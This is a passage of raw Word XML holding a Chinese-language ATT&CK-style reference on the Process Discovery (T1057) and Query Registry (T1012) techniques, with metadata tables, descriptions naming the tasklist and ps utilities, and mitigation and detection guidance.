        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:t>可能会使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>带</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内置功能的远程访问工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t xml:space="preserve"> API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交互</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以收集</w:t>
      </w:r>
      <w:r>
        <w:t>信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也</w:t>
      </w:r>
      <w:r>
        <w:t>可能会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统管理工具（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Management Instrumentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）来获取信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC00436" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0096095B" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>进程发现</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00791727" w14:paraId="44A8DD17" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="546E428A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00791727" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00791727">
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00791727">
              <w:t>T1057</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24FB8772" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00791727" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00791727">
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>发现</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6087D5B0" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00791727" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00791727">
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00791727">
              <w:rPr>
                <w:rStyle w:val="h5"/>
              </w:rPr>
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00791727">
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00791727">
              <w:rPr>
                <w:rStyle w:val="h5"/>
              </w:rPr>
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00791727">
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00791727">
              <w:rPr>
                <w:rStyle w:val="h5"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="561DA065" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00791727" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="h5"/>
              </w:rPr>
              <w:t>要求：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A95C9E">
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统用户</w:t>
            </w:r>
            <w:r w:rsidRPr="00A95C9E">
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可能会提供更好的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程</w:t>
            </w:r>
            <w:r w:rsidRPr="00A95C9E">
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所有权详细信息</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="499F2C44" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00791727" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="h5"/>
              </w:rPr>
              <w:t>权限：用户，管理员，系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A7203EB" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00791727" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00791727">
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00791727">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="030D38B3" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00791727" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00791727">
              <w:rPr>
                <w:rStyle w:val="h5"/>
              </w:rPr>
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="00791727">
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号：</w:t>
            </w:r>
            <w:hyperlink r:id="rId178" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00791727">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>CAPEC-573</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00791727">
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D44D4EA" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00791727" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00791727">
              <w:rPr>
                <w:rStyle w:val="h5"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00791727">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D36A229" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00250E05" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53F7BA76" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00343ADC" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00343ADC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会尝试获取系统上正在运行进程的相关信息，从而了解网络内系统上运行的通用软件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B92A37" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179568A8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00343ADC" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00343ADC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r w:rsidRPr="00343ADC">
        <w:t>进程详细信息的示例命令有</w:t>
      </w:r>
      <w:hyperlink r:id="rId179" w:history="1">
        <w:r w:rsidRPr="00343ADC">
          <w:rPr>
            <w:rStyle w:val="af4"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>Tasklist</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00343ADC">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00343ADC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实用程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00343ADC">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00343ADC">
        <w:t>tasklist</w:t>
      </w:r>
      <w:r w:rsidRPr="00343ADC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DCC55A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>Mac and Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058C031D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00C30A40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mac</w:t>
      </w:r>
      <w:r w:rsidRPr="00C30A40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00C30A40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统中</w:t>
      </w:r>
      <w:r w:rsidRPr="00C30A40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t xml:space="preserve"> ps</w:t>
      </w:r>
      <w:r w:rsidRPr="00C30A40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用来获取</w:t>
      </w:r>
      <w:r>
        <w:t>进程详细信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00C30A40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676014D9" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0CB434" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术基于系统功能的滥用，无法通过预防性控制来轻松缓解其造成的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6A13E5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068A0C57" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00343ADC" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00343ADC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统和网络发现技术通常用在攻击者试图了解环境的整个操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00343ADC">
        <w:t>过程</w:t>
      </w:r>
      <w:r w:rsidRPr="00343ADC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中。不应孤立地看待数据和事件，而应将其视为可能导致其他活动的一系列行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00343ADC">
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00343ADC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一部分，</w:t>
      </w:r>
      <w:r w:rsidRPr="00343ADC">
        <w:t>例如横向移动</w:t>
      </w:r>
      <w:r w:rsidRPr="00343ADC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79081867" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00343ADC" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00343ADC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看起来</w:t>
      </w:r>
      <w:r w:rsidRPr="00343ADC">
        <w:t>像进程发</w:t>
      </w:r>
      <w:r w:rsidRPr="00343ADC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现</w:t>
      </w:r>
      <w:r w:rsidRPr="00343ADC">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00343ADC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正常、良性系统和网络事件可能不常见，具体取决于环境及其使用方式。监控进程和命令行参数来查看是否有收集</w:t>
      </w:r>
      <w:r w:rsidRPr="00343ADC">
        <w:t>系统和网络信息的行为。</w:t>
      </w:r>
      <w:r w:rsidRPr="00343ADC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00343ADC">
        <w:t>可能会使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00343ADC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>带内置功能的远程访问工具来直接与</w:t>
      </w:r>
      <w:r w:rsidRPr="00343ADC">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00343ADC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00343ADC">
        <w:t xml:space="preserve"> API</w:t>
      </w:r>
      <w:r w:rsidRPr="00343ADC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交互以收集</w:t>
      </w:r>
      <w:r w:rsidRPr="00343ADC">
        <w:t>信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00343ADC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也</w:t>
      </w:r>
      <w:r w:rsidRPr="00343ADC">
        <w:t>可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="00343ADC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00343ADC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00343ADC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统管理工具（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00343ADC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Management Instrumentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00343ADC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00343ADC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00343ADC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）来获取信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469D2D77" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00EC3F22" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC3F22">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查询</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC3F22">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>注册表</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="007526C7" w14:paraId="4469EE9B" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16E6066D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>T1012</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11912F0F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>技术：发现</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09C7136A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35408F7E" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>：用户，管理员，系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08CDA147" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:lastRenderedPageBreak/>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注册表</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53B0E5BA" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007526C7" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007526C7">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2EF38893" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00355C2E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FCB4831" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="0022598A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会与</w:t>
      </w:r>
      <w:r w:rsidRPr="0022598A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="0022598A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册表进行交互</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="0022598A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="0022598A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置和已安装软件的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关</w:t>
      </w:r>
      <w:r w:rsidRPr="0022598A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449D6302" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="0022598A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册表包含操作系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="0022598A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="0022598A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>软件和安全性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关的</w:t>
      </w:r>
      <w:r w:rsidRPr="0022598A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大量信息。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r w:rsidRPr="0022598A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一些信息可能会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有助于攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="0022598A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在网络中进一步扩大</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其操作范围</w:t>
      </w:r>
      <w:r w:rsidRPr="0022598A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EC0A15" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
